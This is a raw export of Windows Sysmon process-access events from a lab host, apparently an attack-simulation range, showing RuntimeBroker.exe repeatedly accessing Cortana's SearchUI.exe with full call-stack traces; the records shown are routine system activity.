12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245476C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245476C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 